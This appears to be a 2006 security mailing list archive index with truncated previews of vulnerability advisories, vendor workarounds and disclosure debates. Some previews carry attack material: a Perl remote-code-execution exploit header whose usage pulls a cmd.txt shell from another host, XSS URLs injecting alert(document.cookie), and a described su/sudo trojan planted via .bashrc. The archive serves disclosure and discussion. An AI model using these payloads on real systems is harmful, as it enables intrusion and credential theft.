eEye Digital Security has created a temporary work around for the
current Internet Explorer zero day vulnerability within the IE
createTextRange functionality.
This workaround has been created because currently there is no solution
from Microsoft other than the workaround to disable Active Script
#!/usr/bin/perl
##
# VWar <= 1.5.0 R11 Remote Code Execution Exploit
# Bug Found By [Oo] code by uid0/zod
##
# (c) 2006
# ExploiterCode.com
##
# usage:
# perl vwar.pl
#
# perl vwar.pl http://site.com/vwar/ http://site.com/cmd.txt cmd
#
# cmd shell example:
#
# cmd shell variable: ($_GET[cmd]);
Daniel Weber wrote:
Crispin Cowan wrote:
I participated in that Lincoln Labs study, and my recollection is
that the remote/local distinction was already popular on bugtraq at
the time.
I've seen a lot of classification schemes proposed on Bugtraq in the
intervening years, some of them quite g
New eVuln Advisory:
Maian Events SQL Injection Vulnerability
http://evuln.com/vulns/102/summary.html
Summary
eVuln ID: EV0102
CVE: CVE-2006-1341
Software: Maian Events
Sowtware's Web Site: http://www.maianscriptworld.co.uk/
Versions: 1.0
Critical Level: Moderate
> No, he said: "I am up to the challange and I will do my best." If he
> couldn't he would have been responsible enough to say "I can't."
>
> If he stayed anyway and would have not been up to task (which he was),
> he would have been seriously attacked as well and maybe even it would
> have been t
Hello
Vulnerable: AL-Caricatier,V.2.5
http://www.php-ar.com
Exploit :
http://example.com/AL-Caricatier/view_caricatier.php?CatName='>alert(document.cookie);
http://example.com/AL-Caricatier/view_caricatier.php?CaricatierID='>alert(document.cookie);
http://example.com/AL-Caricatier/view_caricatie
New eVuln Advisory:
Maian Support Authentication Bypass
http://evuln.com/vulns/103/summary.html
Summary
eVuln ID: EV0103
CVE: CVE-2006-1259
Software: Maian Support
Sowtware's Web Site: http://www.maianscriptworld.co.uk/
Versions: 1.0
Critical Level: Moderate
Typ
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
- --
Debian Security Advisory DSA 1021-1[EMAIL PROTECTED]
http://www.debian.org/security/ Moritz Muehlenhoff
March 28th, 2006
Software Vulnerable
Genius VideoCAM NB Driver
http://download.geniusnet.com.tw/CAMERA/webnb.zip
Other genius webcams with the same 'snapshot feature' might be
affected with the same issue, if you have any of those please try to
reproduce this issue.
Affects: Windows XP / Windows 2000
Proof of
==
Secunia Research 28/03/2006
- Blazix Web Server JSP Source Code Disclosure Vulnerability -
==
Table of Contents
Affected Software.
>* Theo de Raadt:
>
>> What if we ignore your procedures? What if we say no?
>
>You won't be told about bugs in the code you write. It's as simple as
>that.
>
>But I don't quite understand why Gadi is so thoroughly offended by the
>way how this vulnerability has been handled so far. The patches
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
the correct URL for the full advisory should be
http://securityresponse.symantec.com/avcenter/security/Content/2006.03.2
7.html
-BEGIN PGP SIGNATURE-
Version: PGP Desktop 9.0.5 (Build 5050)
iQA/AwUBRCl0MpIF/uvuJQrOEQJJkACg1cuOuGWn7e90QLgkmjw
If you're going to get someone to run the mytrojan.exe file, why not just
have it add itself to the exception list for you? I've said it a million
times, and here is a million-and-one: When a statement starts off with "If I
get someone to run X on their their system, I can," then it doesn't matter
"The web hacking incident database (WHID) is a Web Application Security
Consortium project
dedicated to maintaining a list of web applications related security incidents.
The goal
is to serve as a tool for raising awareness of the web application security
problem and
provide the information for
ArabPortal 2.0 Stable .. The Best Arbian Portal & Forums System
* The Bug Is XSS *
[code]
online.php?&title=D3vil-0x1CODE
download.php?action=byuser&userid=1&title=D3vil-0x1CODE
[/code]
[center]
^^ Secumod 0.1 Anti-XSS & SQL Injection ^^
[ Get It For Free !! Only 15$ And Update it forever ]
[ C
On Fri, 24 Mar 2006, Dave Korn wrote:
John Richard Moser wrote:
Here is a simple hack to break sudo and su to get free root. Add this
to ~/.bashrc and fill in the following blanks:
* ~/.root_kit/rk_su
Your hacked su to give root on su --now-dammit
* ~/.root_kit/silent_install_root_kit
Your
On Tue, Mar 28, 2006 at 01:19:34AM +0200, Moritz Muehlenhoff wrote:
> If you use code, which is derived from a vulnerable lex grammar in
> an untrusted environment you need to regenerate your scanner with the
> fixed version of flex.
Do any Debian packages include such a vulnerable grammar? (If s
March 27, 2006
Determina Fix for CVE-2006-1359
(Zero Day MS Internet Explorer Remote "CreateTextRange()" Code Execution)
Overview & Instructions On Downloading The Free Determina Shield For
CVE-2006-1359
Based on the same technology used in the VPS LiveShield product, Determina
has engineer
Eric Allman wrote:
I know the guy who exploited it. He's better than you think he is.
I'm sorry, I was not trying to imply in any way that Mark was blowing
smoke. I believe he can do it. Take my statement literally: /we/ don't
/see/ how it can be practical. Perhaps I should have said "un
Quick Summary:
Product : Movilnet's Web SMS.
Version : In-production versions.
Vendor : Movilnet - http://www.movilnet.com.ve/
Class : Remote
Criticality : High
Operating System(s) : N/A.
Synopsis
*
All bug was fixed in 0.1.9.1b
http://www.phpstats.net
>So, in other words, all you need in order to get root access is a
>rootkit, your shell script, and root access? Ummm... I don't get it.
I was also confused by this. However, one guess is that by
compromising an unprivileged account and creating command aliases to
run trojaned su and sudo progra
Hello,
just to stop this:
The bug is a binary safety issue in html_entity_decode. A function that
is not usually used on user input, because user input is usually not
expected in HTML format and then decoded. Even if the function is used
on user input it can only leak memory to a potential attack
Hi everybody!
I want to tell that pretty nasty bug was discovered in PHP (all tested
versions were vulnerable). I do not want to disclose much details as it may
hurt many websites. I expect PHP team to make patch first.
There is simple way to protect yourself against this bug if you put some co
Internet Explorer 6 on XP SP2 portuguese seems not vulnerable to code
execution, that´s what I conclude after several tests on 4 machines. the
vulnerability exists, but it causes IE to crash after some time and Windows
alerts about low virtual memory. some times while IE was frozen and windows
25 matches
Mail list logo
